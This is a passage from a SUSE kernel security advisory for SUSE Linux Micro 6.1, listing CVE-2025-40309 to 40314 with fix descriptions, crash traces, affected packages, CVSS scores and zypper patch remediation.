net/bluetooth/hci_conn.c:1147\n hci_abort_conn_sync+0x8c5/0xbb0 net/bluetooth/hci_sync.c:5689\n hci_cmd_sync_work+0x281/0x380 net/bluetooth/hci_sync.c:332\n process_one_work kernel/workqueue.c:3236 [inline]\n process_scheduled_works+0x77e/0x1040 kernel/workqueue.c:3319\n worker_thread+0xbee/0x1200 kernel/workqueue.c:3400\n kthread+0x3c7/0x870 kernel/kthread.c:463\n ret_from_fork+0x13a/0x1e0 arch/x86/kernel/process.c:148\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n \u003c/TASK\u003e\n\nAllocated by task 31370:\n kasan_save_stack mm/kasan/common.c:47 [inline]\n kasan_save_track+0x30/0x70 mm/kasan/common.c:68\n poison_kmalloc_redzone mm/kasan/common.c:388 [inline]\n __kasan_kmalloc+0x82/0x90 mm/kasan/common.c:405\n kasan_kmalloc include/linux/kasan.h:260 [inline]\n __do_kmalloc_node mm/slub.c:4382 [inline]\n __kmalloc_noprof+0x22f/0x390 mm/slub.c:4394\n kmalloc_noprof include/linux/slab.h:909 [inline]\n sk_prot_alloc+0xae/0x220 net/core/sock.c:2239\n sk_alloc+0x34/0x5a0 net/core/sock.c:2295\n bt_sock_alloc+0x3c/0x330 net/bluetooth/af_bluetooth.c:151\n sco_sock_alloc net/bluetooth/sco.c:562 [inline]\n sco_sock_create+0xc0/0x350 net/bluetooth/sco.c:593\n bt_sock_create+0x161/0x3b0 net/bluetooth/af_bluetooth.c:135\n __sock_create+0x3ad/0x780 net/socket.c:1589\n sock_create net/socket.c:1647 [inline]\n __sys_socket_create net/socket.c:1684 [inline]\n __sys_socket+0xd5/0x330 net/socket.c:1731\n __do_sys_socket net/socket.c:1745 [inline]\n __se_sys_socket net/socket.c:1743 [inline]\n __x64_sys_socket+0x7a/0x90 net/socket.c:1743\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xc7/0x240 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nFreed by task 31374:\n kasan_save_stack mm/kasan/common.c:47 [inline]\n kasan_save_track+0x30/0x70 mm/kasan/common.c:68\n kasan_save_free_info+0x40/0x50 mm/kasan/generic.c:576\n poison_slab_object mm/kasan/common.c:243 [inline]\n __kasan_slab_free+0x3d/0x50 mm/kasan/common.c:275\n kasan_slab_free include/linux/kasan.h:233 [inline]\n slab_free_hook mm/slub.c:2428 [inline]\n slab_free mm/slub.c:4701 [inline]\n kfree+0x199/0x3b0 mm/slub.c:4900\n sk_prot_free net/core/sock.c:2278 [inline]\n __sk_destruct+0x4aa/0x630 net/core/sock.c:2373\n sco_sock_release+0x2ad/0x300 net/bluetooth/sco.c:1333\n __sock_release net/socket.c:649 [inline]\n sock_close+0xb8/0x230 net/socket.c:1439\n __fput+0x3d1/0x9e0 fs/file_table.c:468\n task_work_run+0x206/0x2a0 kernel/task_work.c:227\n get_signal+0x1201/0x1410 kernel/signal.c:2807\n arch_do_signal_or_restart+0x34/0x740 arch/x86/kernel/signal.c:337\n exit_to_user_mode_loop+0x68/0xc0 kernel/entry/common.c:40\n exit_to_user_mode_prepare include/linux/irq-entry-common.h:225 [inline]\n s\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40309",
"url": "https://www.suse.com/security/cve/CVE-2025-40309"
},
{
"category": "external",
"summary": "SUSE Bug 1255065 for CVE-2025-40309",
"url": "https://bugzilla.suse.com/1255065"
},
{
"category": "external",
"summary": "SUSE Bug 1255066 for CVE-2025-40309",
"url": "https://bugzilla.suse.com/1255066"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "important"
}
],
"title": "CVE-2025-40309"
},
{
"cve": "CVE-2025-40310",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40310"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\namd/amdkfd: resolve a race in amdgpu_amdkfd_device_fini_sw\n\nThere is race in amdgpu_amdkfd_device_fini_sw and interrupt.\nif amdgpu_amdkfd_device_fini_sw run in b/w kfd_cleanup_nodes and\n kfree(kfd), and KGD interrupt generated.\n\nkernel panic log:\n\nBUG: kernel NULL pointer dereference, address: 0000000000000098\namdgpu 0000:c8:00.0: amdgpu: Requesting 4 partitions through PSP\n\nPGD d78c68067 P4D d78c68067\n\nkfd kfd: amdgpu: Allocated 3969056 bytes on gart\n\nPUD 1465b8067 PMD @\n\nOops: @002 [#1] SMP NOPTI\n\nkfd kfd: amdgpu: Total number of KFD nodes to be created: 4\nCPU: 115 PID: @ Comm: swapper/115 Kdump: loaded Tainted: G S W OE K\n\nRIP: 0010:_raw_spin_lock_irqsave+0x12/0x40\n\nCode: 89 e@ 41 5c c3 cc cc cc cc 66 66 2e Of 1f 84 00 00 00 00 00 OF 1f 40 00 Of 1f 44% 00 00 41 54 9c 41 5c fa 31 cO ba 01 00 00 00 \u003cfO\u003e OF b1 17 75 Ba 4c 89 e@ 41 Sc\n\n89 c6 e8 07 38 5d\n\nRSP: 0018: ffffc90@1a6b0e28 EFLAGS: 00010046\n\nRAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000018\n0000000000000001 RSI: ffff8883bb623e00 RDI: 0000000000000098\nffff8883bb000000 RO8: ffff888100055020 ROO: ffff888100055020\n0000000000000000 R11: 0000000000000000 R12: 0900000000000002\nffff888F2b97da0@ R14: @000000000000098 R15: ffff8883babdfo00\n\nCS: 010 DS: 0000 ES: 0000 CRO: 0000000080050033\n\nCR2: 0000000000000098 CR3: 0000000e7cae2006 CR4: 0000000002770ce0\n0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n0000000000000000 DR6: 00000000fffeO7FO DR7: 0000000000000400\n\nPKRU: 55555554\n\nCall Trace:\n\n\u003cIRQ\u003e\n\nkgd2kfd_interrupt+@x6b/0x1f@ [amdgpu]\n\n? amdgpu_fence_process+0xa4/0x150 [amdgpu]\n\nkfd kfd: amdgpu: Node: 0, interrupt_bitmap: 3 YcpxFl Rant tErace\n\namdgpu_irq_dispatch+0x165/0x210 [amdgpu]\n\namdgpu_ih_process+0x80/0x100 [amdgpu]\n\namdgpu: Virtual CRAT table created for GPU\n\namdgpu_irq_handler+0x1f/@x60 [amdgpu]\n\n__handle_irq_event_percpu+0x3d/0x170\n\namdgpu: Topology: Add dGPU node [0x74a2:0x1002]\n\nhandle_irq_event+0x5a/@xcO\n\nhandle_edge_irq+0x93/0x240\n\nkfd kfd: amdgpu: KFD node 1 partition @ size 49148M\n\nasm_call_irq_on_stack+0xf/@x20\n\n\u003c/IRQ\u003e\n\ncommon_interrupt+0xb3/0x130\n\nasm_common_interrupt+0x1le/0x40\n\n5.10.134-010.a1i5000.a18.x86_64 #1",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40310",
"url": "https://www.suse.com/security/cve/CVE-2025-40310"
},
{
"category": "external",
"summary": "SUSE Bug 1255041 for CVE-2025-40310",
"url": "https://bugzilla.suse.com/1255041"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40310"
},
{
"cve": "CVE-2025-40311",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40311"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\naccel/habanalabs: support mapping cb with vmalloc-backed coherent memory\n\nWhen IOMMU is enabled, dma_alloc_coherent() with GFP_USER may return\naddresses from the vmalloc range. If such an address is mapped without\nVM_MIXEDMAP, vm_insert_page() will trigger a BUG_ON due to the\nVM_PFNMAP restriction.\n\nFix this by checking for vmalloc addresses and setting VM_MIXEDMAP\nin the VMA before mapping. This ensures safe mapping and avoids kernel\ncrashes. The memory is still driver-allocated and cannot be accessed\ndirectly by userspace.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40311",
"url": "https://www.suse.com/security/cve/CVE-2025-40311"
},
{
"category": "external",
"summary": "SUSE Bug 1255068 for CVE-2025-40311",
"url": "https://bugzilla.suse.com/1255068"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "low"
}
],
"title": "CVE-2025-40311"
},
{
"cve": "CVE-2025-40312",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40312"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\njfs: Verify inode mode when loading from disk\n\nThe inode mode loaded from corrupted disk can be invalid. Do like what\ncommit 0a9e74051313 (\"isofs: Verify inode mode when loading from disk\")\ndoes.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40312",
"url": "https://www.suse.com/security/cve/CVE-2025-40312"
},
{
"category": "external",
"summary": "SUSE Bug 1255046 for CVE-2025-40312",
"url": "https://bugzilla.suse.com/1255046"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40312"
},
{
"cve": "CVE-2025-40314",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40314"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: cdns3: gadget: Use-after-free during failed initialization and exit of cdnsp gadget\n\nIn the __cdnsp_gadget_init() and cdnsp_gadget_exit() functions, the gadget\nstructure (pdev-\u003egadget) was freed before its endpoints.\nThe endpoints are linked via the ep_list in the gadget structure.\nFreeing the gadget first leaves dangling pointers in the endpoint list.\nWhen the endpoints are subsequently freed, this results in a use-after-free.\n\nFix:\nBy separating the usb_del_gadget_udc() operation into distinct \"del\" and\n\"put\" steps, cdnsp_gadget_free_endpoints() can be executed prior to the\nfinal release of the gadget structure with usb_put_gadget().\n\nA patch similar to bb9c74a5bd14(\"usb: dwc3: gadget: Free gadget structure\n only after freeing endpoints\").",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
